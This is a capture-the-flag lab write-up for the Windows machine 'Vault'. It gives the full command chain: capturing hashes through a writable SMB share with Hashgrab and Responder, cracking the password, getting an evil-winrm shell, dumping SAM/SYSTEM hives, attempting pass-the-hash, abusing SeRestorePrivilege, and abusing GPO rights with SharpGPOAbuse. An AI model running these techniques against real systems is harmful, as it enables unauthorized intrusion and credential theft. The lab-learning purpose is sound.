Vault

Source: Proving Grounds OS: Windows Community Rating: Hard

Enumeration & Reconnaissance

  • Started with autorecon as usual and, again, many open ports, but this time there were no HTTP ports, a surprise. We had to find a different initial foothold than the regulars.

Service Analysis

  • I began by checking SMB. While enum4linux-ng showed nothing, smbclient exposed a non-default share named DocumentsShare. Although it was empty, we had write access.

smbclient -N -L \192.168.194.172
smbclient \192.168.194.172\DocumentsShare
SMB Enumeration

Gaining Initial Access

  • Having write access to the share meant we could create a shared link and use Responder to capture the authenticated access attempt when someone clicks the item.

Checking Writing to SMB Share

  • I used the tool Hashgrab, which automatically creates the necessary files. I then moved them to the share that we have write access over, started Responder, and waited for the hashes:

python3 hashgrab.py 192.168.45.201 hashgraber #Create the files then move them to the SMB share.
sudo responder -I tun0 -wv #Start responder
Grabbing the Hashes

  • After that, I got the hash. I then tried hashcat, but it was too slow, so I switched to John the Ripper:

sudo hashcat hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
john --wordlist=/usr/share/wordlists/rockyou.txt hash

  • This revealed the password: anirudh:SecureHM

Credentials Cracked

  • Now that I had the credentials, I attempted to use them. RDP was open, but testing it didn’t work, and I personally prefer a terminal (I feel like a proper hacker). So I used evil-winrm to get a shell:

#Trying RDP
xfreerdp3 /cert:ignore /dynamic-resolution +clipboard /u:'anirudh' /p:'SecureHM' /v:192.168.194.172
rdesktop -u 'anirudh' -p 'SecureHM' -g 85% -D 192.168.194.172

evil-winrm -i 192.168.194.172 -u anirudh -p "SecureHM" #Evil-winrm
Trying RDP

Privilege Escalation

  • Once inside, I checked privileges and discovered a couple of interesting ones: SeBackupPrivilege & SeRestorePrivilegeBoth could be used to escalate privileges.

Privileges

  • I started with SeBackupPrivilege. With it, we can dump the SAM and SYSTEM hives and extract hashes from them. I ran:

reg save hklm\sam C:\Users\anirudh\Desktop\sam.hive
reg save hklm\system C:\Users\anirudh\Desktop\system.hive
Extracting the Hives

  • Then I moved them to Linux and I executed:

impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Getting the Hashes

  • I tried to perform Pass-the-Hash (PtH) and log in as Administrator, but that failed. For example:

impacket-wmiexec -hashes :608339ddc8f434ac21945e026887dc36 Administrator@192.168.194.172
PtH Failing
PtH Failing with Impacket-wmiexec

  • PtH has a few prerequisites, it requires an SMB connection through the firewall (commonly port 445) and that the Windows File and Printer Sharing feature is enabled. It also requires the admin share (ADMIN$) to be available, so maybe one of these weren’t fulfilled.

  • I moved on to the next privilege. SeRestorePrivilege. I used an executable from my toolkit called SeRestoreAbuse.exe. I created a shell, uploaded it to the target, and then executed:

.\SeRestoreAbuse.exe "cmd /c C:\Users\anirudh\Documents\shell.exe"

  • This granted me a shell as SYSTEM.

  • I like to review writeups when I finish (or when I get stuck and need hints). I discovered another option for privilege escalation using BloodHound. I first collected data from the Windows host using:

powershell -ep bypass
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\anirudh\Desktop\ -OutputPrefix "vaultoffsec"
Sharphound Data Gathering

  • I then downloaded the data to my Kali machine and started BloodHound. With it, I discovered that our current user had GenericWrite over the GPO named "Default Domain Policy".

BloodHound

  • Even though BloodHound automatically checked for privileges, I could have done it manually with:

Get-GPO -Name "Default Domain Policy"
Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh
Manual Enumeration

  • I then used an executable called SharpGPOAbuse.exe to add our user to the administrators group:

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
gpupdate /force
SharpGpoAbuse

  • After running that, I ended the session and started a new one and that was it, I got admin.

Back as Admin

Lessons Learned

  • Write access to non-default SMB shares can be exploited to capture hashes via tools like Hashgrab and Responder.

  • In AD environments, lateral movement often requires combining multiple techniques, using evil-winrm to gain a shell, then kerberoasting or privilege escalation through SeBackup/SeRestore.

  • PtH depends on specific network and service configurations; if those aren’t met, alternative escalation paths must be explored.

  • When one escalation method fails (like SeBackup with PtH), having another option such as SeRestoreAbuse can be the key to getting SYSTEM.

  • Using BloodHound can help identify misconfigurations in GPO permissions that allow local admin access.

PreviousAccessNextCertificates

Last updated